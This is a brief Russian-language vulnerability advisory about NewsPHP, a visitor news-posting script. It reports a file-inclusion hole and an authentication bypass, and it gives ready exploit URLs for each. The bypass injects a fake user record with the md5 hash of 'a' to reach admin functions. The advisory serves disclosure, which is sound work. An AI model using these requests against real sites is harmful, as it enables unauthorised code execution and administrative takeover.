NewsPHP - утилита для
публикации новостей посетителями сайта. В
программе обнаружено две уязвимости.
Первая - подключение и исполнение
произвольных файлов:

http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file

Вторая - выполнение произвольных административных
функция без авторизации:

http://[host]/nphp/?[action here, example: output]&
     pword=a&
     uname=[fake usernamehere]&
     nphp_users[user index here][0]=a&
     nphp_users[user index here][1]=
0cc175b9c0f1b6a831c399e269772661&
     nphp_users[user index here][3]=5

где md5('a') = '0cc175b9c0f1b6a831c399e269772661'

Оставить мнение